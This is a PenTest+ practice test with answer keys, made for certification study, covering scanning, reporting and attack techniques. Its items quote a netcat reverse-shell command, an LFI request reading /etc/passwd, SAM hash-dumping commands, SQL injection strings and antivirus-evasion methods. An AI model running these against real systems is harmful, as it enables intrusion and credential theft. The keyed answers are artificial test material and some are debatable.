Ethical Hacking and CompTIA PenTest+ with 2 Practice Tests Set 1

Which command can be used to help analyze the contents of a binary file? (Select two.)

Options are:

  • `echo`
  • `strings` (Correct)
  • `cat`
  • `binwalk` (Correct)

Answer: `strings`, `binwalk`


The HTTPOnly attribute that can accompany a Set-Cookie response header is responsible for which of the following?

Options are:

  • Defining the URL where the cookie is valid
  • Setting the Secure flag to only allow for SSL connections
  • Preventing the cookie from being accessed via JavaScript (Correct)
  • Defining the domain where the cookie is valid

Answer: Preventing the cookie from being accessed via JavaScript

Which of the following TCP ports host applications that naturally support file transfer capabilities? (Choose three.)

Options are:

  • 53
  • 21 (Correct)
  • 902
  • 22 (Correct)
  • 80 (Correct)

Answer: 21, 22, 80

What does the following script do?

```
#!/bin/bash

today=$(date +%Y-%m-%d)
log_dir="/var/www/logs"
dst_dir="/tmp/logs"

# Count the log files waiting in the source directory
count=$(ls $log_dir | wc -l)

if [ $count -gt 0 ]; then
    echo "Moving $count logs on $today" >>/var/www/moveLog.txt
    # Move the logs to the staging directory, then push each one to the remote host
    mv $log_dir/* $dst_dir
    for i in $(ls $dst_dir); do
        scp -i key $dst_dir/$i [email protected]:/logs/websrv1/www
        echo $dst_dir/$i
        # Remove the local copy once it has been secure copied
        rm -rf $dst_dir/$i
    done
else
    echo "No files to move $today" >>/var/www/moveLog.txt
fi
```

Options are:

  • Secure copies the files and then removes the files from the remote host
  • Copies log files to another directory and then removes all the logs
  • Moves log files to another directory and then secure copies the files to another host using a password
  • Moves log files to another directory, then secure copies the files to another host using `scp`, and then removes the files that were secure copied (Correct)

Answer: Moves log files to another directory, then secure copies the files to another host using `scp`, and then removes the files that were secure copied


When executing a UDP port scan against a customer network, you want to start out by scanning only those ports that are known to have UDP services present. Which of the following options can you use to scan for SNMP, NTP, NetBIOS, and DNS?

Options are:

  • `nmap -vv -sUV -p 53-123,137,139,161 192.168.1.0/24 -oA udpscan`
  • `nmap -vv -sUV -p 53, 123, 137-139, 161, 123 192.168.1.0/24 -oA udpscan`
  • `nmap -vv -sUV -p 53-161 192.168.1.0/24 -oA udpscan`
  • `nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan` (Correct)

Answer: `nmap -vv -sUV -p 53,123,137-139,161 192.168.1.0/24 -oA udpscan`

Which contractual document is signed by two consenting parties to protect each other's competitive advantages?

Options are:

  • SOW
  • RoE
  • NDA (Correct)
  • MSA

Answer: NDA

Which of the following options provides guidance for planning and conducting technical information security tests?

Options are:

  • NIST SP 800-37
  • FIPS 199
  • NIST SP 800-115 (Correct)
  • DoD 8570

Answer: NIST SP 800-115


Which of the following commands can help recover the list of local hashes from the SAM database? (Choose three.)

Options are:

  • `mimikatz_command -f samdump::hashes` (Correct)
  • `mimikatz_command -f samdump::`
  • `impacket-secretsdump [user]:[pass]@[ipaddress]` (Correct)
  • The Windows `reg` command (Correct)

Answer: `mimikatz_command -f samdump::hashes`, `impacket-secretsdump [user]:[pass]@[ipaddress]`, the Windows `reg` command

Which service is the following nmap command syntax going to scan?

```
nmap -n -Pn -sUV -p 53 192.168.1.50
```

Options are:

  • FTP
  • DNS (Correct)
  • NTP
  • SNMP

Answer: DNS

Which of the following can be used as a defense-evasion technique? (Choose three.)

Options are:

  • Changing and modifying code from the `Invoke-Mimikatz.ps1` script from PowerSploit to evade antivirus signature detection (Correct)
  • Using MD5 to encode a password that can be used in Mimikatz with PtH on a Windows network
  • Base64-encoding a PowerShell command to execute against a remote host on the network (Correct)
  • Encoding an x86 Windows payload with shikata_ga_nai (Correct)

Answer: Changing and modifying code from the `Invoke-Mimikatz.ps1` script from PowerSploit to evade antivirus signature detection; Base64-encoding a PowerShell command to execute against a remote host on the network; Encoding an x86 Windows payload with shikata_ga_nai


Which of the following can be used to automatically set the RHOSTS field for the Metasploit module using the results of a search? (Select all that apply.)

Options are:

  • All of the answer choices are correct (Correct)
  • `notes -S "http" -R`
  • `hosts -R`
  • `services -p 445 -R`
  • `vulns -p 22 --rhosts`

Answer: All of the answer choices are correct

The schedule is an important element to include in the report, as it helps put findings into perspective, such as how long it took to find a particular vulnerability and the time it took to exploit it. This section in the report can be referred to as what?

Options are:

  • Timeline (Correct)
  • Methodology
  • Observations
  • Issues

Answer: Timeline

What is this command doing?

```
nc 192.168.1.50 4444 -e cmd.exe
```

Options are:

  • Forward a command shell from the local Windows host to a remote host over the network (Correct)
  • Forward a command shell from the local Linux host to a remote host over the network
  • Forward a command shell from the remote host to the local Windows host over the network
  • Forward a command shell from the remote host to the local Linux host over the network

Answer: Forward a command shell from the local Windows host to a remote host over the network


The customer uses unattended installation files to automate configuration of both physical and virtual hosts on the network. The remote file share that contains the unattended installation files is writable by everyone on the network. What mitigation would you recommend to the customer to help secure their network? (Choose three.)

Options are:

  • Restrict access based on IP address (Correct)
  • Lock down access to the share based on domain access (Correct)
  • Discontinue using unattended installation
  • Restrict write access to only trusted hosts (Correct)

Answer: Restrict access based on IP address; Lock down access to the share based on domain access; Restrict write access to only trusted hosts

What is the methodology or process of enumerating useful information from a target over the network?

Options are:

  • Network information gathering (Correct)
  • Scanning
  • Vulnerability identification
  • Fingerprinting

Answer: Network information gathering

Which network share is available to any member of an organization's Windows Active Directory domain and holds Group Policy Preferences (GPP) to help automate tedious administrative tasks?

Options are:

  • IPC$
  • C$
  • SYSVOL (Correct)
  • ADMIN$

Answer: SYSVOL


Which of the following stakeholders from an organization might be interested in the findings and success of a penetration test?

Options are:

  • All of the answer choices are correct (Correct)
  • Executive management
  • IT department
  • The pentest team
  • Contracting or legal department

Answer: All of the answer choices are correct

Which of the following is a valid reason for executing an authenticated vulnerability scan against a target?

Options are:

  • The scan will help exploit target weaknesses and carry out post-exploitation activities.
  • It produces more findings.
  • It helps to reduce false positives. (Correct)
  • You will be able to show more impact in your test results.

Answer: It helps to reduce false positives.

Which of the following algorithms can be used to generate a cryptographic hash value for a password?

Options are:

  • AES
  • MD5 (Correct)
  • RSA
  • Base64

Answer: MD5


Which of the following are common methods used to accomplish VLAN hopping on switched networks? (Choose two.)

Options are:

  • NAC
  • Double tagging (Correct)
  • DNS spoofing
  • Switch spoofing (Correct)

Answer: Double tagging, Switch spoofing

Which of the following services can aid a pentester with lateral movement? (Choose all that apply.)

Options are:

  • RSH
  • All of the answer choices are correct (Correct)
  • REXEC
  • DCOM
  • Telnet

Answer: All of the answer choices are correct

What is the purpose of a table of contents in the pentest report?

Options are:

  • To provide page numbers
  • All of the answer choices are correct (Correct)
  • To organize the report
  • To list headings and subheadings

Answer: All of the answer choices are correct


Which type of confidential document covers items such as social responsibility, business ethics, network and facility access, and so forth?

Options are:

  • NDA
  • SOW
  • RoE
  • MSA (Correct)

Answer: MSA

Which type of testing forces the pentester to gather information using creative methods and sources and typically does not provide any upfront customer knowledge of the environment to be tested?

Options are:

  • White box
  • Black box (Correct)
  • Gray box
  • Goals-based

Answer: Black box

Which of the following commands can you use to query information from an organization's OpenLDAP server?

Options are:

  • `accesschk.exe`
  • `net group`
  • `searchsploit`
  • `ldapsearch` (Correct)

Answer: `ldapsearch`


The customer has requested that the pentest report be encrypted and e-mailed to the project manager identified in the RoE. From the following choices, which option reduces the risk of unauthorized disclosure?

Options are:

  • Encrypt the e-mail and report, then send the decryption password for the report via text message. (Correct)
  • Encrypt the report, then send the decryption password and the report in the same e-mail.
  • Encrypt the e-mail and report and send them to the project manager.
  • Encrypt the e-mail and report, then send the decryption password for the report via another e-mail.

Answer: Encrypt the e-mail and report, then send the decryption password for the report via text message.

The unquoted service path vulnerability can be used to escalate privileges on a Windows target and exploits what function of the operating system?

Options are:

  • Windows registry
  • CreateProcess (Correct)
  • Task Scheduler
  • Weak access controls

Answer: CreateProcess

Using the following example PHP code, what type of attack could this application be susceptible to?

Example HTTP GET request:

```
http://www.example.com/test.php?img=photo1.png
```

Example PHP code:

```
<?php
$WebDir = '/var/www/html/';
if (!(isset($_GET['img']))) die();
$img = $_GET['img'];
$path = $WebDir . $img;
$handle = fopen($path, 'rb');
// ..additional code omitted below...
?>
```

Options are:

  • SQLi
  • Directory indexing
  • Directory traversal attack (Correct)
  • Clickjacking

Answer: Directory traversal attack


Which of the following command-line utilities can be used to interrogate a DNS server?

Options are:

  • `dig` (Correct)
  • `domainname`
  • `whois`
  • `bind`

Answer: `dig`

When should you dispose of the customer's pentest report and sensitive data? (Choose the BEST answer.)

Options are:

  • Never.
  • After the customer debrief.
  • The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE. (Correct)
  • Once the customer confirms receipt of the pentest report.

Answer: The report should be disposed of after the customer confirms receipt of the pentest report, based on agreed-upon terms in the RoE.

Which fully executed document provides authorization from an organization to conduct a pentest and will include or elaborate on subjects defined in the SOW?

Options are:

  • RoE (Correct)
  • NDA
  • Contractual agreement
  • MSA

Answer: RoE


Which of the following hash types is used in pass the hash (PtH) attacks?

Options are:

  • NTLM (Correct)
  • NTLMv2
  • SHA256
  • MD5

Answer: NTLM

Which type of assessment is required for organizations that accept, process, or store consumer payment card information?

Options are:

  • PCI DSS (Correct)
  • HIPAA
  • Red team
  • FISMA

Answer: PCI DSS

What is senior (executive) management's role in a top-down management approach?

Options are:

  • To dictate goals and objectives (Correct)
  • To carry out the plan of action for the organization
  • To update the organization's policy documentation
  • None of the answer choices are correct

Answer: To dictate goals and objectives


Which of the following Windows shares are readable on the local area network by default?

Options are:

  • IPC$ (Correct)
  • ADMIN$
  • All of the answer choices are correct
  • C$

Answer: IPC$

The following HTTP POST request is an example of what type of attack?

```
POST /request.php?id=php://input&cmd=cat%20/etc/passwd HTTP/1.1
```

Options are:

  • Local file inclusion (LFI) (Correct)
  • Directory traversal
  • Remote file inclusion (RFI)
  • Cross-site request forgery (CSRF)

Answer: Local file inclusion (LFI)

Which of the following utilities can be used to enumerate NFS share information from a file server over the network? (Choose two.)

Options are:

  • All of the answer choices are correct
  • `rpcinfo`
  • `nfs-showmount.nse` (Correct)
  • `showmount` (Correct)

Answer: `nfs-showmount.nse`, `showmount`


When using the airodump-ng tool to collect wireless network packets, why would you want to define the channel to listen on?

Options are:

  • When attempting to crack the wireless encryption key or four-way handshake, it's best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks. (Correct)
  • Using the same channel as your target wireless device will help speed up the time necessary to crack the PSK offline.
  • You should always specify the channel your target is listening on when conducting wireless surveys and exploitation activities.
  • Channel hopping is a technique used by airodump-ng to determine the channel a target host is listening on.

Answer: When attempting to crack the wireless encryption key or four-way handshake, it's best to stick to the channel your target is listening on to prevent frequency hopping, which could limit your ability to collect all of the packets necessary for password recovery attacks.

Which of the following options can be used to conduct vulnerability research?

Options are:

  • CAPEC
  • CWE
  • CVE
  • All of the answer choices are correct (Correct)

Answer: All of the answer choices are correct

When conducting network and enumeration scanning on the customer's network, your team requests operating system information to help with the vulnerability mapping process. Given the following nmap syntax, which of the following options can help provide OS fingerprinting?

```
nmap -vv -n -Pn -sSVC -O -T4 -p- 10.1.10.0/24 -oA 10.1.10.0.syn
```

Options are:

  • `-n`
  • `-Pn`
  • `-O` (Correct)
  • `-sSV`

Answer: `-O`


Which of the following options is an example of Boolean-based SQL injection? (Choose two.)

Options are:

  • `www.example.com/info.php?id=2;2--`
  • `www.example.com/info.php?id=2 AND 3=4` (Correct)
  • `www.example.com/info.php?id=1 AND 1=1` (Correct)
  • `www.example.com/info.php?id=1;UNION SELECT * from mysql.users;--`

Answer: `www.example.com/info.php?id=2 AND 3=4`, `www.example.com/info.php?id=1 AND 1=1`

The customer is using SSH for remote logins and transferring files to hosts on the local area network. However, you also found FTP and Telnet open on most of the Unix servers in the customer environment. The system administrator says they don't use those legacy programs any longer. How would you document this in a pentest report, even though you did not exploit these services?

Options are:

  • Ask for additional time to test the services.
  • Include as an "unnecessary open services" observation in the executive summary. (Correct)
  • Record this as a critical finding.
  • Do not address this in the report, since the services are on the LAN and are not exposed to external attacks.

Answer: Include as an "unnecessary open services" observation in the executive summary.

Which of the following can assist you with brute-forcing a web application login page? (Choose three.)

Options are:

  • CeWL (Correct)
  • Hydra (Correct)
  • XSS
  • Wordlist (Correct)
  • CSRF

Answer: CeWL, Hydra, Wordlist


Which of the following compliance standards require(s) organizations to maintain a secure environment? (Choose three.)

Options are:

  • FISMA (Correct)
  • NIST
  • HIPAA (Correct)
  • PCI DSS (Correct)
  • CIS

Answer: FISMA, HIPAA, PCI DSS

The username and password of admin/admin could be considered which of the following?

Options are:

  • Weak credential
  • Susceptible to brute-force or password guessing attacks
  • Default credential
  • All of the answer choices are correct (Correct)

Answer: All of the answer choices are correct
